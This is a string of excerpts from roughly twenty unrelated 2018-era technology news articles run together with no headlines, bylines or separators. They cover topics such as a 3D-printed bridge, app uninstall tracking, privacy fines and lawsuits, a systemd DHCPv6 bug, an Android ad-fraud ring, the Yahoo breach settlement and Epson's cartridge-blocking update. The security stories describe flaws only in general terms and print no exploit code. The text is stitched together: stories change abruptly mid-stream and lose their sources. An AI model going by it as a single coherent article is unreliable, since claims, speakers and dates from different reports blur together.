The creators of the world’s first 3D-printed steel bridge, a 40-foot stainless steel structure titled simply “The Bridge” that looks tantalizingly otherworldly thanks to its unique construction methods, say it is now ready for installation in Amsterdam following its ongoing week on show at the Dutch Design Week from Oct. 20-28.
Photo: MX3D (Joris Laarman Lab)
The team at MX3D, which originally planned to build the Joris Laarman Lab-designed bridge in mid-air over a canal but later opted to construct it in a controlled environment away from pedestrians, told Gizmodo in a statement that it is now ready to commence the structure’s final installation in Amsterdam’s famed De Wallen red-light district. They’ve also shared a number of photos from the finished bridge, which is designed to look like two billowing sheets connected by organic curves of steel, on display at the festival. It looks fantastic:
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
As the construction method is new and has not previously been used in any such large-scale project, MX3D worked with Amsterdam officials to develop a new safety standard and have also coordinated with partners including the UK’s Alan Turing Institute to equip it with a network of sensors. MX3D told Gizmodo that once in place the structure will be capable of collecting data on “bridge traffic, structural integrity, and the surrounding neighborhood and environment,” with the information being “used as input for a ‘digital twin’ of the bridge” that will be monitored to detect any safety issues. A steel deck on the bottom of the bridge should also provide additional stability.
If it seems as though the app you deleted last week is suddenly popping up everywhere, it may not be mere coincidence. Companies that cater to app makers have found ways to game both iOS and Android, enabling them to figure out which users have uninstalled a given piece of software lately—and making it easy to pelt the departed with ads aimed at winning them back.
Adjust, AppsFlyer, MoEngage, Localytics, and CleverTap are among the companies that offer uninstall trackers, usually as part of a broader set of developer tools. Their customers include T-Mobile US, Spotify Technology, and Yelp. (And Bloomberg Businessweek parent Bloomberg LP, which uses Localytics.) Critics say they’re a fresh reason to reassess online privacy rights and limit what companies can do with user data. “Most tech companies are not giving people nuanced privacy choices, if they give them choices at all,” says Jeremy Gillula, tech policy director at the Electronic Frontier Foundation, a privacy advocate.
Some providers say these tracking tools are meant to measure user reaction to app updates and other changes. Jude McColgan, chief executive officer of Boston’s Localytics, says he hasn’t seen clients use the technology to target former users with ads. Ehren Maedge, vice president for marketing and sales at MoEngage Inc. in San Francisco, says it’s up to the app makers not to do so. “The dialogue is between our customers and their end users,” he says. “If they violate users’ trust, it’s not going to go well for them.” Adjust, AppsFlyer, and CleverTap didn’t respond to requests for comment, nor did T-Mobile, Spotify, or Yelp.
Uninstall tracking exploits a core element of Apple Inc.’s and Google’s mobile operating systems: push notifications. Developers have always been able to use so-called silent push notifications to ping installed apps at regular intervals without alerting the user—to refresh an inbox or social media feed while the app is running in the background, for example. But if the app doesn’t ping the developer back, the app is logged as uninstalled, and the uninstall tracking tools add those changes to the file associated with the given mobile device’s unique advertising ID, details that make it easy to identify just who’s holding the phone and advertise the app to them wherever they go.
The tools violate Apple and Google policies against using silent push notifications to build advertising audiences, says Alex Austin, CEO of Branch Metrics Inc., which makes software for developers but chose not to create an uninstall tracker. “It’s just generally sketchy to track people around the internet after they’ve opted out of using your product,” he says, adding that he expects Apple and Google to crack down on the practice soon. Apple and Google didn’t respond to requests for comment.
Facebook announced today that it has removed 8.7 million pieces of content last quarter that violated its rules against child exploitation, thanks to new technology. The new AI and machine learning tech, which was developed and implemented over the past year by the company, removed 99 percent of those posts before anyone reported them, said Antigone Davis, Facebook’s global head of safety, in a blog post.
The new technology examines posts for child nudity and other exploitative content when they are uploaded and, if necessary, photos and accounts are reported to the National Center for Missing and Exploited Children. Facebook had already been using photo-matching technology to compare newly uploaded photos with known images of child exploitation and revenge porn, but the new tools are meant to prevent previously unidentified content from being disseminated through its platform.
The technology isn’t perfect, with many parents complaining that innocuous photos of their kids have been removed. Davis addressed this in her post, writing that in order to “avoid even the potential for abuse, we take action on nonsexual content as well, like seemingly benign photos of children in the bath” and that this “comprehensive approach” is one reason Facebook removed as much content as it did last quarter.
But Facebook’s moderation technology is by no means perfect and many people believe it is not comprehensive or accurate enough. In addition to family snapshots, it’s also been criticized for removing content like the iconic 1972 photo of Phan Thi Kim Phuc, known as the “Napalm Girl,” fleeing naked after suffering third-degree burns in a South Vietnamese napalm attack on her village, a decision COO Sheryl Sandberg apologized for.
The UK’s Information Commissioner has formally fined Facebook £500,000 – the maximum available – over the Cambridge Analytica scandal.
In a monetary penalty notice issued this morning, the Information Commissioner’s Office (ICO) stated that the social media network had broken two of the UK’s legally binding data protection principles by allowing Cambridge academic Aleksandr Kogan to harvest 87 million Facebook users’ personal data through an app disguised as an innocent online quiz.
“Facebook… failed to keep the personal information secure because it failed to make suitable checks on apps and developers using its platform. These failings meant one developer, Dr Aleksandr Kogan and his company GSR, harvested the Facebook data of up to 87 million people worldwide, without their knowledge,” said the ICO in its statement on the fine.
“The Facebook Companies thereby acted in breach of section 4(4) of the [Data Protection Act], which at all material time required data controllers to comply with the data protection principles in relation to all personal data in respect of which they were the data controller,” continued the ICO in its penalty notice (PDF, 27 pages).
The £500k fine is the maximum penalty available to the ICO under 1998’s Data Protection Act. The regulator noted: “But for the statutory limitation on the amount of the monetary penalty, it would have been reasonable and proportionate to impose a higher penalty.” Nonetheless, with Facebook making a net income of $5.1bn in its latest fiscal quarter, the penalty amounts to just over quarter of an hour’s profits*.
In a landmark study, 20 top US corporate lawyers with decades of experience in corporate law and contract review were pitted against an AI. Their task was to spot issues in five Non-Disclosure Agreements (NDAs), which are a contractual basis for most business deals.
The study, carried out with leading legal academics and experts, saw the LawGeex AI achieve an average 94% accuracy rate, higher than the lawyers who achieved an average rate of 85%. It took the lawyers an average of 92 minutes to complete the NDA issue spotting, compared to 26 seconds for the LawGeex AI. The longest time taken by a lawyer to complete the test was 156 minutes, and the shortest time was 51 minutes. The study made waves around the world and was covered across global media.
A security bug in Systemd can be exploited over the network to, at best, potentially crash a vulnerable Linux machine, or, at worst, execute malicious code on the box.
The flaw therefore puts Systemd-powered Linux computers – specifically those using systemd-networkd – at risk of remote hijacking: maliciously crafted DHCPv6 packets can try to exploit the programming cockup and arbitrarily change parts of memory in vulnerable systems, leading to potential code execution. This code could install malware, spyware, and other nasties, if successful.
The vulnerability – which was made public this week – sits within the written-from-scratch DHCPv6 client of the open-source Systemd management suite, which is built into various flavors of Linux.
This client is activated automatically if IPv6 support is enabled, and relevant packets arrive for processing. Thus, a rogue DHCPv6 server on a network, or in an ISP, could emit specially crafted router advertisement messages that wake up these clients, exploit the bug, and possibly hijack or crash vulnerable Systemd-powered Linux machines.
systemd-networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network adjacent DHCP servers. A attacker could exploit this via malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.
A vulnerability that is trivial to exploit allows privilege escalation to root level on Linux and BSD distributions using X.Org server, the open source implementation of the X Window System that offers the graphical environment.
[…]
Three hours after the public announcement of the security gap, Daemon Security CEO Michael Shirk replied with one line that overwrote shadow files on the system. Hickey did one better and fit the entire local privilege escalation exploit in one line.
Apart from OpenBSD, other operating systems affected by the bug include Debian and Ubuntu, Fedora and its downstream distro Red Hat Enterprise Linux along with its community-supported counterpart CentOS.
AI can translate between languages in real time as people speak, according to fresh research from Chinese search giant Baidu and Oregon State University in the US.
Human interpreters need superhuman concentration to listen to speech and translate at the same time. There are, apparently, only a few thousand qualified simultaneous interpreters and the job is so taxing that they often work in pairs, swapping places after 20 to 30 minute stints. And as conversations progress, the chance for error increases exponentially.
Machines have the potential to trump humans at this task, considering they have superior memory and don’t suffer from fatigue. But it’s not so easy for them either, as researchers from Baidu and Oregon State University found.
They built a neural network that can translate between Mandarin Chinese to English in almost real time, where the English translation lags behind by up to at least five words. The results have been published in a paper on arXiv.
The babble post-Babel
Languages have different grammatical structures, where the word order of sentences often don’t match up, making it difficult to translate quickly. The key to a fast translation is predicting what the speaker will say next as he or she talks.
With the AI engine an encoder converts the words in a target language into a vector representation. A decoder predicts the probability of the next word given the words in the previous sentences. The decoder is always behind the encoder and generates the translated words until it processes the whole speech or text.
“In one of the examples, the Chinese sentence ‘Bush President in Moscow…’ would suggest the next English word after ‘President Bush’ is likely ‘meets’”, Liang Huang, principal scientist at Baidu Research, explained to The Register.
“This is possible because in the training data, we have a lot of “Bush meeting someone, like Putin in Moscow” so the system learned that if “Bush in Moscow”, he is likely “meeting” someone.
The difficulty depends on the languages being translated, Huang added. Languages that are closely related, such as French and Spanish for example, have similar structures where the order of words are aligned more.
Japanese and German sentences are constructed with the subject at the front, the object in the middle, and the verb at the end (SOV). English and Chinese also starts with the subject, but the verb is in the middle, followed by the object (SVO).
Translating between Japanese and German to English and Chinese, therefore, more difficult. “There is a well-known joke in the UN that a German-to-English interpreter often has to pause and “wait for the German verb”. Standard Arabic and Welsh are verb-subject-object , which is even more different from SVO,” he said.
The new algorithm can be applied to any neural machine translation models and only involves tweaking the code slightly. It has already been integrated to Baidu’s internal speech-to-text translation and will be showcased at the Baidu World Tech Conference next week on 1st November in Beijing.
“We don’t have an exact timeline for when this product will be available for the general public, this is certainly something Baidu is working on,” Liang said.
“We envision our technology making simultaneous translation much more accessible and affordable, as there is an increasing demand. We also envision the technology [will reduce] the burden on human translators.”
The Portuguese Courts issued today a decision against Google in relation to the injunction filed by Aptoide. It is applicable on 82 countries including UK, Germany, USA, India, among others. Google will have to stop Google Play Protect from removing the competitor Aptoide‘s app store from users‘ phone without users‘ knowledge which has caused losses of over 2.2 million users in the last 60 days.
The acceptance of the injunction is totally aligned with Aptoide’s claim for Google to stop hiding the app store in the Android devices and showing warning messages to the users.
Aptoide is now working alongside its legal team to next week fill in courts the main action, demanding from Google indemnity for all the damages caused.
Aptoide, with over 250 million users, 6 billion downloads and one of the top stores globally, has presented this July, a formal complaint to the European Union’s anti-trust departments against Google.
Paulo Trezentos, Aptoide’s CEO, says that, “For us, this is a decisive victory. Google has been a fierce competitor, abusing his dominant position in Android to eliminate App Store competitors. Innovation is the reason for our 200 million users base. This court’s decision is a signal for startups worldwide: if you have the reason on your side don’t fear to challenge Google.”
About Aptoide
Founded in 2011 and based in Lisbon with offices in Shenzhen and Singapore, Aptoide is one of the top three Android app stores in the world. With over 200 million users, 4 billion downloads and 1 million apps, Aptoide is an app store that reinvents the app discovery experience through an online community, tailored recommendations and the opportunityfor users to create and share their own personal app stores. The Aptoide App Store is available for mobile and TV android devices and is accessible in over 40 languages. With an ever-growing community of users and partners worldwide, Aptoide is now one of the leading players in the world of Apps.
A startup that claims to sell surveillance and hacking technologies to governments around the world left nearly all its data—including information taken from infected targets and victims—exposed online, according to a security firm who found the data.
Wolf Intelligence, a Germany-based spyware company that made headlines for sending a bodyguard to Mauritania and prompting an international incident after the local government detained the bodyguard as collateral for a deal went wrong, left a trove of its own data exposed online. The leak exposed 20 gigabytes of data, including recordings of meetings with customers, a scan of a passport belonging to the company’s founder, scans of the founder’s credit cards, and surveillance targets’ data, according to researchers.
Security researchers from CSIS Security discovered the data on an unprotected command and control server and a public Google Drive folder. The researchers showed screenshots of the leaked data during a talk at the Virus Bulletin conference in Montreal, which Motherboard attended.
“This is a very stupid story in the sense that you would think that a company actually selling surveillance tools like this would know more about operational security,” CSIS co-founder Peter Kruse told Motherboard in an interview. “They exposed themselves—literally everything was available publicly on the internet.”
In a statement on Wednesday, the Italian competition authority, the Autorità Garante della Concorrenza e del Mercato (AGCM), said both companies had violated consumer protection laws by “inducing customers to install updates on devices that are not able to adequately support them.”
It fined Apple €10m ($11.4m): €5m for slowing down the iPhone 6 with its iOS 10 update, and a further €5m for not providing customers with sufficient information about their devices’ batteries, including how to maintain and replace them. Apple banks millions of dollars an hour in profit.
Samsung was fined €5m for its Android Marshmallow 6.0.1 update which was intended for the Galaxy Note 7 but which lead to the Note 4 malfunctioning due to the upgrade’s demands.
Both companies deny they deliberately set out to slow down older phones, but the Italian authorities were not persuaded and clearly felt it was a case of “built-in obsolescence” – where products are designed to fall apart before they need to in order to drive sales of newer models.
It’s no secret that mobile apps harvest user data and share it with other companies, but the true extent of this practice may come as a surprise. In a new study carried out by researchers from Oxford University, it’s revealed that almost 90 percent of free apps on the Google Play store share data with Alphabet.
The researchers, who analyzed 959,000 apps from the US and UK Google Play stores, said data harvesting and sharing by mobile apps was now “out of control.”
“We find that most apps contain third party tracking, and the distribution of trackers is long-tailed with several highly dominant trackers accounting for a large portion of the coverage,” reads the report.
It’s revealed that most of the apps, 88.4 percent, could share data with companies owned by Google parent Alphabet. Next came a firm that’s no stranger to data sharing controversies, Facebook (42.5 percent), followed by Twitter (33.8 percent), Verizon (26.27 percent), Microsoft (22.75 percent), and Amazon (17.91 percent).
According to The Financial Times, which first reported the research, information shared by these third-party apps can include age, gender, location, and information about a user’s other installed apps. The data “enables construction of detailed profiles about individuals, which could include inferences about shopping habits, socio-economic class or likely political opinions.”
Big firms then use the data for a variety of purposes, such as credit scoring and for targeting political messages, but its main use is often ad targeting. Not surprising, given that revenue from online advertising is now over $59 billion per year.
According to the research, the average app transfers data to five tracker companies, which pass the data on to larger firms. The biggest culprits are news apps and those aimed at children, both of which tend to have the most third-party trackers associated with them.
Last April, Steven Schoen received an email from someone named Natalie Andrea who said she worked for a company called We Purchase Apps. She wanted to buy his Android app, Emoji Switcher. But right away, something seemed off.
“I did a little bit of digging because I was a little sketched out because I couldn’t really find even that the company existed,” Schoen told BuzzFeed News.
The We Purchase Apps website listed a location in New York, but the address appeared to be a residence. “And their phone number was British. It was just all over the place,” Schoen said.
It was all a bit weird, but nothing indicated he was about to see his app end up in the hands of an organization responsible for potentially hundreds of millions of dollars in ad fraud, and which has funneled money to a cabal of shell companies and people scattered across Israel, Serbia, Germany, Bulgaria, Malta, and elsewhere.
Schoen had a Skype call with Andrea and her colleague, who said his name was Zac Ezra, but whose full name is Tzachi Ezrati. They agreed on a price and to pay Schoen up front in bitcoin.
“I would say it was more than I had expected,” Schoen said of the price. That helped convince him to sell.
A similar scenario played out for five other app developers who told BuzzFeed News they sold their apps to We Purchase Apps or directly to Ezrati. (Ezrati told BuzzFeed News he was only hired to buy apps and had no idea what happened to them after they were acquired.)
“A significant portion of the millions of Android phone owners who downloaded these apps were secretly tracked as they scrolled and clicked inside the application.”
The Google Play store pages for these apps were soon changed to list four different companies as their developers, with addresses in Bulgaria, Cyprus, and Russia, giving the appearance that the apps now had different owners.
But an investigation by BuzzFeed News reveals that these seemingly separate apps and companies are today part of a massive, sophisticated digital advertising fraud scheme involving more than 125 Android apps and websites connected to a network of front and shell companies in Cyprus, Malta, British Virgin Islands, Croatia, Bulgaria, and elsewhere. More than a dozen of the affected apps are targeted at kids or teens, and a person involved in the scheme estimates it has stolen hundreds of millions of dollars from brands whose ads were shown to bots instead of actual humans. (A full list of the apps, the websites, and their associated companies connected to the scheme can be found in this spreadsheet.)
One way the fraudsters find apps for their scheme is to acquire legitimate apps through We Purchase Apps and transfer them to shell companies. They then capture the behavior of the app’s human users and program a vast network of bots to mimic it, according to analysis from Protected Media, a cybersecurity and fraud detection firm that analyzed the apps and websites at BuzzFeed News’ request.
This means a significant portion of the millions of Android phone owners who downloaded these apps were secretly tracked as they scrolled and clicked inside the application. By copying actual user behavior in the apps, the fraudsters were able to generate fake traffic that bypassed major fraud detection systems.
“This is not your run-of-the-mill fraud scheme,” said Asaf Greiner, the CEO of Protected Media. “We are impressed with the complex methods that were used to build this fraud scheme and what’s equally as impressive is the ability of criminals to remain under the radar.”
Another fraud detection firm, Pixalate, first exposed one element of the scheme in June. At the time, it estimated that the fraud being committed by a single mobile app could generate $75 million a year in stolen ad revenue. After publishing its findings, Pixalate received an email from an anonymous person connected to the scheme who said the amount that’s been stolen was closer to 10 times that amount. The person also said the operation was so effective because it works “with the biggest partners [in digital advertising] to ensure the ongoing flow of advertisers and money.”
In total, the apps identified by BuzzFeed News have been installed on Android phones more than 115 million times, according to data from analytics service AppBrain. Most are games, but others include a flashlight app, a selfie app, and a healthy eating app. One app connected to the scheme, EverythingMe, has been installed more than 20 million times.
Once acquired, the apps continue to be maintained in order to keep real users happy and create the appearance of a thriving audience that serves as a cover for the cloned fake traffic. The apps are also spread among multiple shell companies to distribute earnings and conceal the size of the operation.
When President Trump calls old friends on one of his iPhones to gossip, gripe or solicit their latest take on how he is doing, American intelligence reports indicate that Chinese spies are often listening — and putting to use invaluable insights into how to best work the president and affect administration policy, current and former American officials said.
Mr. Trump’s aides have repeatedly warned him that his cellphone calls are not secure, and they have told him that Russian spies are routinely eavesdropping on the calls, as well. But aides say the voluble president, who has been pressured into using his secure White House landline more often these days, has still refused to give up his iPhones. White House officials say they can only hope he refrains from discussing classified information when he is on them.
Mr. Trump’s use of his iPhones was detailed by several current and former officials, who spoke on the condition of anonymity so they could discuss classified intelligence and sensitive security arrangements. The officials said they were doing so not to undermine Mr. Trump, but out of frustration with what they considered the president’s casual approach to electronic security.
American spy agencies, the officials said, had learned that China and Russia were eavesdropping on the president’s cellphone calls from human sources inside foreign governments and intercepting communications between foreign officials.
It’s increasingly difficult to expect privacy when you’re browsing online, so a non-profit in the UK is working to build the power of Tor’s anonymity network right into the heart of your smartphone.
Brass Horn Communications is experimenting with all sorts of ways to improve Tor’s usability for UK residents. The Tor browser bundle for PCs can help shield your IP address from snoopers and data-collection giants. It’s not perfect and people using it for highly-illegal activity can still get caught, but Tor’s system of sending your data through the various nodes on its network to anonymize user activity works for most people. It can help users surf the full web in countries with restrictive firewalls and simply make the average Joe feel like they have more privacy. But it’s prone to user error, especially on mobile devices. Brass Horn hopes to change that.
Brass Horn’s founder, Gareth Llewelyn, told Motherboard his organization is “about sticking a middle finger up to mobile filtering, mass surveillance.” Llewelyn has been unnerved by the UK’s relentless drive to push through legislation that enables surveillance and undermines encryption. Along with his efforts to build out more Tor nodes in the UK to increase its notoriously slow speeds, Llewelyn is now beta-testing a SIM card that will automatically route your data through Tor and save people the trouble of accidentally browsing unprotected.
Currently, mobile users’ primary option is to use the Tor browser that’s still in alpha-release and couple it with software called Orbot to funnel your app activity through the network. Only apps that have a proxy feature, like Twitter, are compatible. It’s also only available for Android users.
You’ll still need Orbot installed on your phone to use Brass Horn’s SIM card and the whole idea is that you won’t be able to get online without running on the Tor network. There’s some minor setup that the organization walks you through and from that point on, you’ll apparently never accidentally find yourself online without the privacy protections that Tor provides.
In an email to Gizmodo, Llewellyn said that he does not recommend using the card on a device with dual-SIMs. He said the whole point of the project is that a user “cannot accidentally send packets via Clearnet, this is to protect one’s privacy, anonymity and/or protect against NITs etc, if one were to use a dual SIM phone it would negate the failsafe and would not be advisable.” But if a user so desired, they could go with a dual-SIM setup.
You’re also unprotected if you end up on WiFi, but in general, this is a way for journalists, activists, and rightly cautious users to know they’re always protected.
The SIM acts as a provider and Brass Horn essentially functions as a mobile virtual network operator that piggybacks on other networks. The site for Brass Horn’s Onion3G service claims it’s a safer mobile provider because it only issues “private IP addresses to remote endpoints which if ‘leaked’ won’t identify you or Brass Horn Communications as your ISP.” It costs £2.00 per month and £0.025 per megabyte transferred over the network.
A spokesperson for the Tor Project told Gizmodo that it hasn’t been involved in this project and that protecting mobile data can be difficult. “This looks like an interesting and creative way to approach that, but it still requires that you put a lot of trust into your mobile provider in ensuring that no leaks happen,” they said.
Info on joining the beta is available here and Brass Horn expects to make its SIM card available to the general public in the UK next year. Most people should wait until there’s some independent research done on the service, but it’s all an intriguing idea that could provide a model for other countries.
Facebook and Google are being sued in two proposed class-action lawsuits for allegedly deceptively gathering location data on netizens who thought they had opted out of such cyber-stalking.
The legal challenges stem from revelations earlier this year that even after users actively turn off “location history” on their smartphones, their location is still gathered, stored, and exploited to sling adverts.
Both companies use weasel words in their support pages to continue to gather the valuable data while seemingly giving users the option to opt out – and that “deception” is at the heart of both lawsuits.
In the first, Facebook user Brett Heeger claims the antisocial network is misleading folks by providing the option to stop the gathering and storing of their location data but in reality in continues to grab the information and add it to a “Location History” feature that it then uses for targeted advertising.
“Facebook misleads its users by offering them the option to restrict Facebook from tracking, logging and storing their private location information, but then continuing to track, log, and store that location information regardless of users’ choices,” the lawsuit, filed in California, USA, states. “In fact, Facebook secretly tracks, logs and stories location data for all of its users – including those who have sought to limit the information about their locations.”
This action is “deceptive” and offers users a “false sense of security,” the lawsuit alleges. “Facebook’s false assurance are intended to make users feel comfortable continuing to use Facebook and share their personal information so that Facebook can continue to be profitable, at the expense of user privacy… Advertisers pay Facebook to place advertisements because Facebook is so effective at using location information to target advertisement to consumers.”
And over to you, Google
In the second lawsuit, also filed in Cali, three people – Leslie Lee of Wyoming and Colorado residents Stacy Smedley and Fredrick Davis – make the same claim: that Google is deceiving smartphone users by giving them the option to “pause” the gathering of your location data through a setting called “Location History.”
In reality, however, Google continues to gather locations data through its two most popular apps – Search and Maps – even when you actively choose to turn off location data. Instead, users have to go to a separate setting called “Web and App Activity” to really turn the gathering off. There is no mention of location data within that setting and nowhere does Google refer people to that setting in order to really stop location tracking.
As such, Google is engaged in a “deliberate, deceptive practice to collect personal information from which they can generate millions of dollars in revenue by covertly recording contemporaneous location data about Android and iPhone mobile phone users who are using Google Maps or other Google applications and functionalities, but who have specifically opted out of such tracking,” the lawsuit alleges.
Both legal salvos hope to become class-action lawsuits with jury trials, so potentially millions of other affected users will be able to join the action and so propel the case forward. The lawsuits seek compensation and damages as well as injunctions preventing both companies from gathering such data with gaining the explicit consent of users.
Meanwhile at the other end of the scale, the ability for the companies to constantly gather user location data has led to them being targeted by law enforcement in an effort to solve crimes.
Warrant required
Back in June, the US Supreme Court made a landmark ruling about location data, requiring cops and FBI agents to get a warrant before accessing such records from mobile phone operators.
But it is not clear which hurdles or parameters need to be met before a court should sign off on such a warrant, leading to an increasing number of cases where the Feds have provided times, dates, and rough geographic locations and asked Google, Facebook, Snapchat, and others, to provide the data of everyone who was in the vicinity at the time.
This so-called “reverse location” order has many civil liberties groups concerned because it effectively exposes innocent individuals’ personal data to the authorities simply because they were in the same rough area where a crime was carried out.
[…]
Leaky apps
And if all that wasn’t bad enough, this week a paper [PDF] by eggheads at the University of Oxford in the UK who studied the source code of just under one million apps found that Google and Facebook were top of the list when it came to gathering data on users from third parties.
Google parent company Alphabet receives user data from an incredible 88 per cent of apps on the market. Often this information was accumulated through third parties and included information like age, gender and location. The data “enables construction of detailed profiles about individuals, which could include inferences about shopping habits, socio-economic class or likely political opinions,” the paper revealed.
Facebook received data from 43 per cent of the apps, followed by Twitter with 34 per cent. Mobile operator Verizon – renowned for its “super cookie” tracker gets information from 26 per cent of apps; Microsoft 23 per cent; and Amazon 18 per cent.
Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.
The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.
It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.
Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.
Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.
About 3 billion Yahoo accounts were hit by hackers that included some linked to Russia by the FBI . The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.
Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.
The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.
Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.
The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.
For those who don’t remember: Winamp was the MP3 player of choice around the turn of the century, but went through a rocky period during Aol ownership (our former parent company) and failed to counter the likes of iTunes and the onslaught of streaming services, and more or less crumbled over the years. The original app, last updated in 2013, still works, but to say it’s long in the tooth would be something of an understatement (the community has worked hard to keep it updated, however). So it’s with pleasure that I can confirm rumors that substantial updates are on the way.
“There will be a completely new version next year, with the legacy of Winamp but a more complete listening experience,” said Alexandre Saboundjian, CEO of Radionomy, the company that bought Winamp (or what remained of it) in 2014. “You can listen to the MP3s you may have at home, but also to the cloud, to podcasts, to streaming radio stations, to a playlist you perhaps have built.”
“People want one single experience,” he concluded. “I think Winamp is the perfect player to bring that to everybody. And we want people to have it on every device.”
Laugh if you want but I laugh back
Now, I’m a Winamp user myself. And while I’ve been saddened by the drama through which the iconic MP3 player and the team that created it have gone (at the hands of TechCrunch’s former parent company, Aol), I can’t say I’ve been affected by it in any real way. Winamp 2 and 5 have taken me all the way from Windows 98 SE to 10 with nary a hiccup, and the player is docked just to the right of this browser window as I type this. (I use the nucleo_nlog skin.)
And although I bear the burden of my colleagues’ derisive comments for my choice of player, I’m far from alone. Winamp has as many as a hundred million monthly users, most of whom are outside the U.S. This real, engaged user base could be a powerful foot in the door for a new platform — mobile-first, but with plenty of love for the desktop too.
“Winamp users really are everywhere. It’s a huge number,” said Saboundjian. “We have a really strong and important community. But everybody ‘knows’ that Winamp is dead, that we don’t work on it any more. This is not the case.”
Boffins have devised a way to make eavesdropping smartwatches, computers, mobile devices, and speakers with endearing names like Alexa better aware of what’s going on around them.
In a paper to be presented today at the ACM Symposium on User Interface Software and Technology (UIST) in Berlin, Germany, computer scientists Gierad Laput, Karan Ahuja, Mayank Goel, and Chris Harrison describe a real-time, activity recognition system capable of interpreting collected sound.
In other words, a software that uses devices’ always-on builtin microphones to sense what exactly’s going on in the background.
The researchers, based at Carnegie Mellon University in the US, refer to their project as “Ubicoustics” because of the ubiquity of microphones in modern computing devices.
As they observe in their paper, “Ubicoustics: Plug-and-Play Acoustic Activity Recognition,” real-time sound evaluation to classify activities and and context is an ongoing area of investigation. What CMU’s comp sci types have added is a sophisticated sound-labeling model trained on high-quality sound effects libraries, the sort used in Hollywood entertainment and electronic games.
As good as you and me
Sound-identifying machine-learning models built using these audio effects turn out to be more accurate than those trained on acoustic data mined from the internet, the boffins claim. “Results show that our system can achieve human-level performance, both in terms of recognition accuracy and false positive rejection,” the paper states.
The researchers report accuracy of 80.4 per cent in the wild. So their system misclassifies about one sound in five. While not quite good enough for deployment in people’s homes, it is, the CMU team claims, comparable to a person trying to identify a sound. And its accuracy rate is close to other sound recognition systems such as BodyScope (71.5 per cent) and SoundSense (84 per cent). Ubicoustics, however, recognizes a wider range of activities without site-specific training.
Alexa to the rescue
Alexa, informed by this model, could in theory hear if you left the water running in your kitchen and might, given the appropriate Alexa Skill, take some action in response, like turning off your smart faucet or ordering a boat from Amazon.com to navigate around your flooded home. That is, assuming it didn’t misinterpret the sound in the first place.
The researchers suggest their system could be used, for example, to send a notification when a laundry load finished. Or it might promote public health: By detecting frequent coughs or sneezes, the system “could enable smartwatches to track the onset of symptoms and potentially nudge users towards healthy behaviors, such as washing hands or scheduling a doctor’s appointment.”
Printer maker Epson is under fire this month from activist groups after a software update prevented customers from using cheaper, third party ink cartridges. It’s just the latest salvo in a decades-long effort by printer manufacturers to block consumer choice, often by disguising printer downgrades as essential product improvements.
For several decades now printer manufacturers have lured consumers into an arguably-terrible deal: shell out a modest sum for a mediocre printer, then pay an arm and a leg for replacement printer cartridges that cost relatively-little to actually produce.
Unsurprisingly, this resulted in a booming market for discount cartridges and refillable alternatives. Just as unsurprisingly, major printer vendors quickly set about trying to kill this burgeoning market via all manner of lawsuits and dubious behavior.
Initially, companies like Lexmark filed all manner of unsuccessful copyright and patent lawsuits against third-party cartridge makers. When that didn’t work, hardware makers began cooking draconian restrictions into printers, ranging from unnecessary cartridge expiration dates to obnoxious DRM and firmware updates blocking the use of “unofficial” cartridges.
As consumer disgust at this behavior has grown, printer makers have been forced to get more creative in their efforts to block consumer choice.
HP, for example, was widely lambasted back in 2016 when it deployed a “security update” that did little more than block the use of cheaper third-party ink cartridges. HP owners that dutifully installed the update suddenly found their printers wouldn’t work if they’d installed third-party cartridges, forcing them back into the arms of pricier, official HP cartridges.
Massive public backlash forced HP to issue a flimsy mea culpa and reverse course, but the industry doesn’t appear to have learned its lesson quite yet.
The Electronic Frontier Foundation now says that Epson has been engaged in the same behavior. The group says it recently learned that in late 2016 or early 2017, Epson issued a “poison pill” software update that effectively downgraded user printers to block third party cartridges, but disguised the software update as a meaningful improvement.
The EFF has subsequently sent a letter to Texas Attorney General Ken Paxton, arguing that Epson’s lack of transparency can easily be seen as “misleading and deceptive” under Texas consumer protection laws.
“When restricted to Epson’s own cartridges, customers must pay Epson’s higher prices, while losing the added convenience of third party alternatives, such as refillable cartridges and continuous ink supply systems,” the complaint notes. “This artificial restriction of third party ink options also suppresses a competitive ink market and has reportedly caused some manufacturers of refillable cartridges and continuous ink supply systems to exit the market.”
Epson did not immediately return a request for comment.
Activist, author, and EFF member Cory Doctorow tells Motherboard that Epson customers in other states that were burned by the update should contact the organization. That feedback will then be used as the backbone for additional complaints to other state AGs.
